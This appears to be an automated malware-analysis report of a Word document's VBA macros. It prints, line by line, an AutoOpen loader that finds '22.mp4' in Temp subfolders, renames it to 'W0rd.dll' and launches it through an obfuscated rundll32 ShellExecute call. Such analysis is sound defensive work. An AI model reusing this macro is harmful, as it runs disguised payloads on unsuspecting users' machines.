                                                                                                                                                        APIsMeta Information

                                                                                                                                                        Part of subcall function oo@Module2: MoveDown

                                                                                                                                                        Part of subcall function oo@Module2: wdLine

                                                                                                                                                        Part of subcall function oo@Module2: MoveRight

                                                                                                                                                        Part of subcall function oo@Module2: wdCharacter

                                                                                                                                                        Part of subcall function oo@Module2: MoveDown

                                                                                                                                                        Part of subcall function oo@Module2: wdLine

                                                                                                                                                        Part of subcall function oo@Module2: MoveRight

                                                                                                                                                        Part of subcall function oo@Module2: wdCharacter

                                                                                                                                                        Part of subcall function oo@Module2: MoveDown

                                                                                                                                                        Part of subcall function oo@Module2: wdLine

                                                                                                                                                        Part of subcall function oo@Module2: MoveRight

                                                                                                                                                        Part of subcall function oo@Module2: wdCharacter

                                                                                                                                                        Part of subcall function oo@Module2: MoveDown

                                                                                                                                                        Part of subcall function oo@Module2: wdLine

                                                                                                                                                        Part of subcall function oo@Module2: MoveRight

                                                                                                                                                        Part of subcall function oo@Module2: wdCharacter

                                                                                                                                                        Part of subcall function oo@Module2: TypeBackspace

                                                                                                                                                        Part of subcall function oo@Module2: Copy

                                                                                                                                                        Dir

                                                                                                                                                        Left

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        vbDirectory

                                                                                                                                                        Part of subcall function Getme@Module1: CreateObject

                                                                                                                                                        Part of subcall function Getme@Module1: GetFolder

                                                                                                                                                        Part of subcall function Getme@Module1: Dir

                                                                                                                                                        Part of subcall function Getme@Module1: SUBFOLDERS

                                                                                                                                                        Part of subcall function Getme@Module1: Path

                                                                                                                                                        Part of subcall function Getme@Module1: Arr

                                                                                                                                                        Part of subcall function Getme@Module1: Dir

                                                                                                                                                        Part of subcall function Getme@Module1: AttachedTemplate

                                                                                                                                                        Part of subcall function Getme@Module1: ActiveDocument

                                                                                                                                                        Left

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        TypeBackspace

                                                                                                                                                        StringsDecrypted Strings
                                                                                                                                                        """"
                                                                                                                                                        """"
                                                                                                                                                        LineInstructionMeta Information
                                                                                                                                                        6

                                                                                                                                                        Sub ssss()

                                                                                                                                                        7

                                                                                                                                                        Dim ntgs

                                                                                                                                                        8

                                                                                                                                                        Dim sda

                                                                                                                                                        9

                                                                                                                                                        Call oo()

                                                                                                                                                        10

                                                                                                                                                        ntgs = 50

                                                                                                                                                        11

                                                                                                                                                        sda = 49

                                                                                                                                                        12

                                                                                                                                                        Dim jos

                                                                                                                                                        14

                                                                                                                                                        While sda < 50

                                                                                                                                                        15

                                                                                                                                                        ntgs = ntgs - 1

                                                                                                                                                        17

                                                                                                                                                        If Dir(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Loc" & "al\Te" & "mp", vbDirectory) = "" Then

                                                                                                                                                        Dir

                                                                                                                                                        Left

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        vbDirectory

                                                                                                                                                        19

                                                                                                                                                        Else

                                                                                                                                                        21

                                                                                                                                                        sda = 61

                                                                                                                                                        22

                                                                                                                                                        Endif

                                                                                                                                                        24

                                                                                                                                                        Wend

                                                                                                                                                        26

                                                                                                                                                        Call Getme(Left(ActiveDocument.AttachedTemplate.Path, ntgs) & "Local\Temp")

                                                                                                                                                        Left

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        27

                                                                                                                                                        Selection.TypeBackspace

                                                                                                                                                        TypeBackspace

                                                                                                                                                        30

                                                                                                                                                        End Sub

                                                                                                                                                        APIsMeta Information

                                                                                                                                                        CreateObject

                                                                                                                                                        GetFolder

                                                                                                                                                        Dir

                                                                                                                                                        SUBFOLDERS

                                                                                                                                                        Part of subcall function zxc@Module2: Dir

                                                                                                                                                        Part of subcall function zxc@Module2: Dir

                                                                                                                                                        Part of subcall function zxc@Module2: AttachedTemplate

                                                                                                                                                        Part of subcall function zxc@Module2: ActiveDocument

                                                                                                                                                        Part of subcall function zxc@Module2: AttachedTemplate

                                                                                                                                                        Part of subcall function zxc@Module2: ActiveDocument

                                                                                                                                                        Part of subcall function Getme@Module1: CreateObject

                                                                                                                                                        Part of subcall function Getme@Module1: GetFolder

                                                                                                                                                        Part of subcall function Getme@Module1: Dir

                                                                                                                                                        Part of subcall function Getme@Module1: SUBFOLDERS

                                                                                                                                                        Part of subcall function Getme@Module1: Path

                                                                                                                                                        Part of subcall function Getme@Module1: Arr

                                                                                                                                                        Part of subcall function Getme@Module1: Dir

                                                                                                                                                        Part of subcall function Getme@Module1: AttachedTemplate

                                                                                                                                                        Part of subcall function Getme@Module1: ActiveDocument

                                                                                                                                                        Path

                                                                                                                                                        Arr

                                                                                                                                                        Dir

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        Part of subcall function lka@Module1: AttachedTemplate

                                                                                                                                                        Part of subcall function lka@Module1: ActiveDocument

                                                                                                                                                        StringsDecrypted Strings
                                                                                                                                                        "Scripting.FileSystemObject"
                                                                                                                                                        """"
                                                                                                                                                        """"
                                                                                                                                                        LineInstructionMeta Information
                                                                                                                                                        36

                                                                                                                                                        Function Getme(RootPath as String)

                                                                                                                                                        38

                                                                                                                                                        Dim fso as Object

                                                                                                                                                        39

                                                                                                                                                        Dim fld as Object

                                                                                                                                                        40

                                                                                                                                                        Dim vhhs as Object

                                                                                                                                                        41

                                                                                                                                                        Dim afs as String

                                                                                                                                                        42

                                                                                                                                                        Dim myArr

                                                                                                                                                        43

                                                                                                                                                        Dim asdf

                                                                                                                                                        44

                                                                                                                                                        asdf = RootPath

                                                                                                                                                        45

                                                                                                                                                        Set fso = CreateObject("Scripting.FileSystemObject")

                                                                                                                                                        CreateObject

                                                                                                                                                        CreateObject

                                                                                                                                                        47

                                                                                                                                                        Set fld = fso.GetFolder(asdf)

                                                                                                                                                        GetFolder

                                                                                                                                                        GetFolder

                                                                                                                                                        49

                                                                                                                                                        strFileExists = Dir(RootPath & "\22.mp4")

                                                                                                                                                        Dir

                                                                                                                                                        Dir

                                                                                                                                                        50

                                                                                                                                                        If strFileExists = "" Then

                                                                                                                                                        52

                                                                                                                                                        For Each vhhs in fld.SUBFOLDERS

                                                                                                                                                        SUBFOLDERS

                                                                                                                                                        SUBFOLDERS

                                                                                                                                                        55

                                                                                                                                                        afs = vhhs

                                                                                                                                                        57

                                                                                                                                                        Call zxc(afs)

                                                                                                                                                        58

                                                                                                                                                        myArr = Getme(vhhs.Path)

                                                                                                                                                        Path

                                                                                                                                                        Path

                                                                                                                                                        61

                                                                                                                                                        Next

                                                                                                                                                        SUBFOLDERS

                                                                                                                                                        SUBFOLDERS

                                                                                                                                                        62

                                                                                                                                                        Set vhhs = Nothing

                                                                                                                                                        63

                                                                                                                                                        Getme = Arr

                                                                                                                                                        Arr

                                                                                                                                                        Arr

                                                                                                                                                        65

                                                                                                                                                        Set fld = Nothing

                                                                                                                                                        66

                                                                                                                                                        Set fso = Nothing

                                                                                                                                                        70

                                                                                                                                                        Else

                                                                                                                                                        71

                                                                                                                                                        If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then

                                                                                                                                                        Dir

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        Dir

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        74

                                                                                                                                                        Call lka(RootPath)

                                                                                                                                                        75

                                                                                                                                                        Else

                                                                                                                                                        76

                                                                                                                                                        Exit Function

                                                                                                                                                        77

                                                                                                                                                        Endif

                                                                                                                                                        79

                                                                                                                                                        Endif

                                                                                                                                                        82

                                                                                                                                                        End Function

                                                                                                                                                        APIsMeta Information

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        LineInstructionMeta Information
                                                                                                                                                        86

                                                                                                                                                        Sub lka(UUu as String)

                                                                                                                                                        87

                                                                                                                                                        Name UUu & "\22.mp4" As ActiveDocument.AttachedTemplate.Path & "\W0rd.dll"

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        89

                                                                                                                                                        End Sub

                                                                                                                                                        Module: Module2

                                                                                                                                                        Declaration
                                                                                                                                                        LineContent
                                                                                                                                                        1

                                                                                                                                                        Attribute VB_Name = "Module2"

                                                                                                                                                        Non-Executed Functions
                                                                                                                                                        APIsMeta Information

                                                                                                                                                        MoveDown

                                                                                                                                                        wdLine

                                                                                                                                                        MoveRight

                                                                                                                                                        wdCharacter

                                                                                                                                                        MoveDown

                                                                                                                                                        wdLine

                                                                                                                                                        MoveRight

                                                                                                                                                        wdCharacter

                                                                                                                                                        MoveDown

                                                                                                                                                        wdLine

                                                                                                                                                        MoveRight

                                                                                                                                                        wdCharacter

                                                                                                                                                        MoveDown

                                                                                                                                                        wdLine

                                                                                                                                                        MoveRight

                                                                                                                                                        wdCharacter

                                                                                                                                                        TypeBackspace

                                                                                                                                                        Copy

                                                                                                                                                        LineInstructionMeta Information
                                                                                                                                                        2

                                                                                                                                                        Sub oo()

                                                                                                                                                        3

                                                                                                                                                        Selection.MoveDown Unit := wdLine, Count := 1

                                                                                                                                                        MoveDown

                                                                                                                                                        wdLine

                                                                                                                                                        4

                                                                                                                                                        Selection.MoveRight Unit := wdCharacter, Count := 5

                                                                                                                                                        MoveRight

                                                                                                                                                        wdCharacter

                                                                                                                                                        5

                                                                                                                                                        Selection.MoveDown Unit := wdLine, Count := 24

                                                                                                                                                        MoveDown

                                                                                                                                                        wdLine

                                                                                                                                                        6

                                                                                                                                                        Selection.MoveRight Unit := wdCharacter, Count := 50

                                                                                                                                                        MoveRight

                                                                                                                                                        wdCharacter

                                                                                                                                                        7

                                                                                                                                                        Selection.MoveDown Unit := wdLine, Count := 24

                                                                                                                                                        MoveDown

                                                                                                                                                        wdLine

                                                                                                                                                        8

                                                                                                                                                        Selection.MoveRight Unit := wdCharacter, Count := 5

                                                                                                                                                        MoveRight

                                                                                                                                                        wdCharacter

                                                                                                                                                        9

                                                                                                                                                        Selection.MoveDown Unit := wdLine, Count := 24

                                                                                                                                                        MoveDown

                                                                                                                                                        wdLine

                                                                                                                                                        10

                                                                                                                                                        Selection.MoveRight Unit := wdCharacter, Count := 50

                                                                                                                                                        MoveRight

                                                                                                                                                        wdCharacter

                                                                                                                                                        11

                                                                                                                                                        Selection.TypeBackspace

                                                                                                                                                        TypeBackspace

                                                                                                                                                        12

                                                                                                                                                        Selection.Copy

                                                                                                                                                        Copy

                                                                                                                                                        14

                                                                                                                                                        End Sub

                                                                                                                                                        APIsMeta Information

                                                                                                                                                        Dir

                                                                                                                                                        Dir

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        StringsDecrypted Strings
                                                                                                                                                        """"
                                                                                                                                                        """"
                                                                                                                                                        LineInstructionMeta Information
                                                                                                                                                        18

                                                                                                                                                        Sub zxc(sf as String)

                                                                                                                                                        19

                                                                                                                                                        strFileExists = Dir(sf & "\22.mp4")

                                                                                                                                                        Dir

                                                                                                                                                        21

                                                                                                                                                        If strFileExists = "" Then

                                                                                                                                                        23

                                                                                                                                                        Else

                                                                                                                                                        24

                                                                                                                                                        If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then

                                                                                                                                                        Dir

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        26

                                                                                                                                                        Name sf & "\22.mp4" As ActiveDocument.AttachedTemplate.Path & "\W0rd.dll"

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        27

                                                                                                                                                        Else

                                                                                                                                                        28

                                                                                                                                                        Exit Sub

                                                                                                                                                        29

                                                                                                                                                        Endif

                                                                                                                                                        31

                                                                                                                                                        Endif

                                                                                                                                                        32

                                                                                                                                                        End Sub

                                                                                                                                                        Module: ThisDocument

                                                                                                                                                        Declaration
                                                                                                                                                        LineContent
                                                                                                                                                        1

                                                                                                                                                        Attribute VB_Name = "ThisDocument"

                                                                                                                                                        2

                                                                                                                                                        Attribute VB_Base = "1Normal.ThisDocument"

                                                                                                                                                        3

                                                                                                                                                        Attribute VB_GlobalNameSpace = False

                                                                                                                                                        4

                                                                                                                                                        Attribute VB_Creatable = False

                                                                                                                                                        5

                                                                                                                                                        Attribute VB_PredeclaredId = True

                                                                                                                                                        6

                                                                                                                                                        Attribute VB_Exposed = True

                                                                                                                                                        7

                                                                                                                                                        Attribute VB_TemplateDerived = True

                                                                                                                                                        8

                                                                                                                                                        Attribute VB_Customizable = True

                                                                                                                                                        Non-Executed Functions
                                                                                                                                                        APIsMeta Information

                                                                                                                                                        Part of subcall function ssss@Module1: Dir

                                                                                                                                                        Part of subcall function ssss@Module1: Left

                                                                                                                                                        Part of subcall function ssss@Module1: AttachedTemplate

                                                                                                                                                        Part of subcall function ssss@Module1: ActiveDocument

                                                                                                                                                        Part of subcall function ssss@Module1: vbDirectory

                                                                                                                                                        Part of subcall function ssss@Module1: Left

                                                                                                                                                        Part of subcall function ssss@Module1: AttachedTemplate

                                                                                                                                                        Part of subcall function ssss@Module1: ActiveDocument

                                                                                                                                                        Part of subcall function ssss@Module1: TypeBackspace

                                                                                                                                                        Dir

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        Shell

                                                                                                                                                        Shell32

                                                                                                                                                        ShellExecute

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        SW_SHOWNORMAL

                                                                                                                                                        StringsDecrypted Strings
                                                                                                                                                        """"
                                                                                                                                                        " "
                                                                                                                                                        "rund""ll""32.exe"
                                                                                                                                                        LineInstructionMeta Information
                                                                                                                                                        11

                                                                                                                                                        Sub AutoOpen()

                                                                                                                                                        12

                                                                                                                                                        Call ssss()

                                                                                                                                                        14

                                                                                                                                                        If Dir(ActiveDocument.AttachedTemplate.Path & "\W0rd.dll") = "" Then

                                                                                                                                                        Dir

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        15

                                                                                                                                                        Else

                                                                                                                                                        17

                                                                                                                                                        Dim a as New Shell32.Shell

                                                                                                                                                        Shell

                                                                                                                                                        Shell32

                                                                                                                                                        18

                                                                                                                                                        Dim Scr_hDC as Long

                                                                                                                                                        19

                                                                                                                                                        Call a.ShellExecute("rund" & "ll" & "32.exe", ActiveDocument.AttachedTemplate.Path & "\W0rd.dll,Start", " ", SW_SHOWNORMAL)

                                                                                                                                                        ShellExecute

                                                                                                                                                        AttachedTemplate

                                                                                                                                                        ActiveDocument

                                                                                                                                                        SW_SHOWNORMAL

                                                                                                                                                        20

                                                                                                                                                        Endif

                                                                                                                                                        21

                                                                                                                                                        End Sub

                                                                                                                                                        Reset < >